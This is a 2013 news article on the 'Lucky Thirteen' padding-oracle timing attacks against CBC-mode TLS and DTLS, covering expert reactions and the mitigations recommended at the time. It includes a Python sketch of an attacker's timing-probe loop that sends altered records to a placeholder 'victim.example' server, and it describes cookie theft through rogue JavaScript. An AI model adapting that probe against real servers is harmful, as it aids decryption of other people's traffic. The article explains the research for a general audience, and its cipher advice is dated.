Researchers devise new attack techniques against SSL

Almost all libraries used for implementing some of the Internet's most important security protocols are likely to be vulnerable to the new 'Lucky Thirteen' attacks

The developers of many SSL libraries are releasing patches for a vulnerability that could potentially be exploited to recover plaintext information, such as browser authentication cookies, from encrypted communications.

The patching effort follows the discovery of new ways to attack SSL, TLS and DTLS implementations that use cipher-block-chaining (CBC) mode encryption. The new attack methods were developed by researchers Nadhem J. AlFardan and Kenneth G. Paterson at Royal Holloway, University of London.


The researchers published a paper and a website on Monday with detailed information about their new attacks, which they have dubbed Lucky Thirteen. They've worked with several TLS library vendors, as well as the TLS Working Group of the IETF (Internet Engineering Task Force), to fix the issue.

The TLS (Transport Layer Security) protocol and its predecessor, the SSL (Secure Sockets Layer) protocol, are a core part of HTTPS (Hypertext Transfer Protocol Secure), the primary method of securing communications on the Web. The DTLS (Datagram Transport Layer Security) protocol is based on TLS and used for encrypting connections between applications that communicate over UDP (User Datagram Protocol).

"OpenSSL, NSS, GnuTLS, yaSSL, PolarSSL, Opera, and BouncyCastle are preparing patches to protect TLS in CBC-mode against our attacks," the researchers said on their website.

The discovery means that end users could theoretically be vulnerable to hackers when they visit HTTPS websites that haven't applied the patches. However, security experts say the vulnerability is very hard to exploit, so there may be little cause for alarm.

"The attacks arise from a flaw in the TLS specification rather than as a bug in specific implementations," they said. "The attacks apply to all TLS and DTLS implementations that are compliant with TLS 1.1 or 1.2, or with DTLS 1.0 or 1.2 [the most recent versions of the two specifications]. They also apply to implementations of SSL 3.0 and TLS 1.0 that incorporate countermeasures to previous padding oracle attacks. Variant attacks may also apply to non-compliant implementations."

What this means is that almost all libraries used for implementing some of the Internet's most important security protocols are likely to be vulnerable to the Lucky Thirteen attacks.

The good news is that executing these attacks successfully in the real world to decrypt data from TLS connections is difficult because they require specific server-side and client-side conditions. For example, the attacker needs to be very close to the targeted server -- on the same local area network (LAN).

Padding oracle attacks have been known for over a decade. They involve an attacker capturing an encrypted record in transit, altering certain parts of it, submitting it to the server and monitoring how long the server takes to fail the decryption attempt. By adapting the modifications and analyzing the timing differences across many decryption attempts, the attacker can eventually recover the original plaintext byte by byte.
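To make the mechanics concrete, here is a minimal Python sketch of the attacker's measurement loop, assuming a hypothetical target host, a placeholder captured record and an arbitrary byte position; a real Lucky Thirteen attack would also have to rebuild valid TLS record framing for every guess and is far more involved than this illustration.

    # Timing probe sketch for a padding oracle; host, port and record are placeholders.
    import socket
    import time

    TARGET_HOST = "victim.example"   # hypothetical server
    TARGET_PORT = 443
    captured_record = bytearray(64)  # placeholder for a sniffed CBC-encrypted record

    def probe(modified_record: bytes) -> float:
        # Send one altered record and return how long the server takes to reject it.
        with socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=5) as sock:
            start = time.perf_counter()
            sock.sendall(modified_record)
            try:
                sock.recv(4096)      # wait for the fatal alert or connection teardown
            except socket.timeout:
                pass
            return time.perf_counter() - start

    # Try every value for one byte and record the timings; an outlier among the
    # measurements hints at which guess produced valid-looking padding.
    timings = {}
    for guess in range(256):
        record = bytearray(captured_record)
        record[-17] ^= guess         # flip bits in one byte of the preceding block (placeholder position)
        timings[guess] = probe(bytes(record))

As the rest of the article explains, each such probe destroys the TLS session, so every guess costs a fresh handshake and must be repeated many times to average out network noise.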

The TLS designers attempted to block such attacks in versions 1.1 and 1.2 of the TLS specification, by reducing the timing variations to a level they thought would be too low to be exploitable. However, the Lucky Thirteen research from AlFardan and Paterson shows that this assumption was incorrect and that successful padding oracle attacks are still possible.

"The new AlFardan and Paterson result shows that it is indeed possible to distinguish the tiny timing differential caused by invalid padding, at least from a relatively close distance -- e.g., over a LAN," Matthew Green, a cryptographer and research professor at Johns Hopkins University in Baltimore, Maryland, said Monday in a blog post. "This is partly due to advances in computing hardware: most new computers now ship with an easily accessible CPU cycle counter. But it's also thanks to some clever statistical techniques that use many samples to smooth out and overcome the jitter and noise of a network connection."

In addition to requiring close proximity to the targeted server, a successful Lucky Thirteen attack needs a very high number -- millions -- of attempts in order to gather enough data for a meaningful statistical analysis of the timing differences and to overcome network noise that might interfere with the process.
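The statistical idea is easy to illustrate. The toy Python snippet below simulates a server whose bad-padding path takes a fraction of a microsecond longer than its good-padding path, then shows how the median of a large number of noisy samples makes that tiny gap visible; all of the delays, noise levels and sample counts here are invented for the illustration and are not the researchers' measured figures.

    # Toy simulation: a sub-microsecond processing difference buried in network jitter.
    import random
    import statistics

    def simulated_server(padding_valid: bool) -> float:
        base = 100_000                          # nanoseconds of work common to both paths
        extra = 0 if padding_valid else 800     # invented extra MAC work on bad padding
        jitter = random.gauss(0, 20_000)        # network and scheduling noise dwarfs it
        return base + extra + jitter

    def estimate(padding_valid: bool, samples: int = 100_000) -> float:
        # The median is far more robust to jitter than a single measurement or the mean.
        return statistics.median(simulated_server(padding_valid) for _ in range(samples))

    print(estimate(True), estimate(False))      # the ~800 ns gap emerges from the noise

With enough samples the two medians separate cleanly even though any individual measurement is dominated by noise, which is essentially the trick Green describes.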

In order to achieve this, the attacker would need a way to force the victim's browser to make a very large number of HTTPS connections. This can be done by placing a piece of rogue JavaScript code on a website visited by the victim.

The secret plaintext targeted for decryption needs to have a fixed position in the HTTPS stream. This condition is met by authentication (session) cookies -- small strings of random text stored by websites in browsers to remember logged-in users. An authentication cookie can give the attacker access to the user's account on its corresponding website, making it a valuable piece of information worth stealing.

However, the biggest hurdle to be overcome by potential attackers is the fact that TLS kills the session after each failed decryption attempt, so the session needs to be renegotiated with the server. "TLS handshakes aren't fast, and this attack can take tens of thousands (or millions!) of connections per [recovered] byte," Green said. "So in practice the TLS attack would probably take days. In other words: don't panic."

DTLS, on the other hand, does not kill the session if the server fails to decrypt a record because it was altered, making the Lucky Thirteen attacks borderline practical against that protocol, Green said.

"The attacks can only be carried out by a determined attacker who is located close to the machine being attacked and who can generate sufficient sessions for the attacks," AlFardan and Paterson said. "In this sense, the attacks do not pose a significant danger to ordinary users of TLS in their current form. However, it is a truism that attacks only get better with time, and we cannot anticipate what improvements to our attacks, or entirely new attacks, may yet to be discovered."

Ivan Ristic, director of engineering at security firm Qualys, agrees that the Lucky Thirteen attacks are practical for DTLS, but not practical in their current form for TLS. Nevertheless, the research is significant from an academic standpoint, he said Tuesday via email.

In their HTTPS configurations, Web server administrators have the option of prioritizing a cipher suite that's not affected by these types of attack. For many, the only choice is RC4, a stream cipher that dates back to 1987.

"There's a wide dislike of RC4 because of its known flaws (none of which apply or applied to SSL/TLS), but we haven't yet seen a working attack against RC4 as used in TLS," Ristic said. "In that sense, even though RC4 is not ideal, it appears to be stronger than the alternatives currently available in TLS 1.0."

TLS 1.2 supports AES-GCM (AES in Galois/Counter Mode), a more modern class of cipher suites that's also not vulnerable to these types of attack. However, overall adoption of TLS 1.2 is currently low.

According to data from SSL Pulse, a project created by Qualys to monitor the quality of SSL/TLS support across the Web, only 11 percent of the Internet's top 177,000 HTTPS websites have support for TLS 1.2.

"I think this discovery will be yet another reason to speed up TLS 1.2 deployment," Ristic said.

This is not the first time people have suggested prioritizing RC4 in TLS to prevent padding oracle attacks. The same thing happened two years ago when the BEAST (Browser Exploit Against SSL/TLS) attack was announced.

"From the most recent SSL Pulse results (January), we know that 66.7% of the servers are vulnerable to the BEAST attack, which means that they do not prioritize RC4," Ristic said. "Of those, a small number will support TLS 1.2 and may prioritize a non-CBC suite supported only in this version of the protocol. However, because so few browsers support TLS 1.2, I think we can estimate that about 66% of the servers will negotiate CBC."

Copyright © 2013 IDG Communications, Inc.